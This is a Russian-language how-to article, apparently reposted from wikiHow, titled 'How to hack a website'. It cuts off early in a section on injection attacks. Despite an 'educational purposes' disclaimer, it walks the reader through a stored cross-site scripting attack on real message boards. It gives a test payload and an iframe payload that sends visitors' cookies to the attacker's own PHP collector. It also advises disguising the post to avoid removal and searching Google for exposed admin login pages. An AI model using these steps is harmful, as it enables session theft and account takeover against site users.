Компьютеры-и-электроника

Как взломать веб–сайт

  • Применение межсайтового скриптинга
  • Выполнение инъекционных атак
  • Основа для успеха
  • Источники

Обратите внимание: эта инструкция приведена исключительно в образовательных целях, чтобы помочь изучить методы взлома в законных целях и понять принцип работы хакеров для защиты своих веб-сайтов. Эта инструкция поможет получить доступ к веб-сайтам с НИЗКИМ уровнем защиты.

Применение межсайтового скриптинга

Найдите уязвимый сайт, на котором можно размещать контент.

Хороший пример - доска объявлений. Помните, если сайт хорошо защищен, это не сработает.

Перейдите к созданию поста.

Вам нужно в тело поста вставить специальный код, собирающий данные тех, кто на него кликнет.
  • Вы захотите проверить, отсеивает ли система код. Опубликуйте <script...>alert(“test”)</...script> (не забудьте убрать “…”). Если при нажатии на свой пост появляется окно с предупреждением, тогда этот сайт уязвим для атаки.

Создайте и загрузите свой php-скрипт, который будет получать данные.

Цель этой атаки - собрать пользовательские данные типа "cookie", хранящие информацию об учетных записях пользователей. Ее можно использовать для входа в их аккаунты на уязвимых веб-сайтах. Вам потребуется php-скрипт, который будет воровать куки вашей цели и перенаправлять их на ваш сайт. Загрузите php-скрипт на веб-сайт, к которому у вас есть доступ и который поддерживает php. Пример кода php-скрипта можно найти в разделе "Примеры".

Опубликуйте JavaScript-код.

Введите в тело поста JavaScript-код, который будет воровать куки и отправлять их на ваш сайт. Чтобы сделать пост менее подозрительным и уберечь его от удаления, после кода впишите какой-нибудь текст.
  • Пример кода будет выглядеть следующим образом: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”ВАШURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (удалите ...).

Использование полученных куки.

После этого можете использовать сохраненные у вас на веб-сайте данные куки для любых целей.

Выполнение инъекционных атак

Найдите уязвимый сайт.

Вам нужно найти уязвимый сайт с легкодоступным входом в качестве администратора. Попробуйте поискать в Google по запросу admin login.asp. .......

Полный текст новости доступен на источнике

Продолжить читать на источнике ➔

Популярные статьи в разделе: Компьютеры-и-электроника

Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:18
Как создать учетную запись AOL
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:18
Как извлечь файлы из архива
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:18
Как создать сайт на Wordpress
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:18
Как копировать и вставлять контент в Chromebook
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:18
Как редактировать и представлять офлайн Prezi
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:18
Как сослаться на видео из YouTube
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:18
Как изменить свой пароль на Yahoo
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:18
Как использовать Appcleaner для Mac
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:19
Как добавить видео в избранное на YouTube
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:19
Как добавить кнопку «Подписаться» на Facebook
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:19
Как установить веб–камеру
Иконка предмета
Компьютеры-и-электроника, 15.11.2019 14:19
Как скачивать с Pirate Bay
У тебя есть свой ответ?
Как взломать веб–сайт...
Отправлено

Популярные статьи сегодня

Категория
Питомцы-и-животные, 15.11.2019 14:19
Категория
Хобби-и-рукоделие, 15.11.2019 14:19
Категория
Кулинария-и-гостеприимство, 15.11.2019 14:19
Категория
Кулинария-и-гостеприимство, 15.11.2019 14:19
Категория
Хобби-и-рукоделие, 15.11.2019 14:19
Категория
Хобби-и-рукоделие, 15.11.2019 14:19
У тебя есть свой ответ?
Как взломать веб–сайт...
Отправлено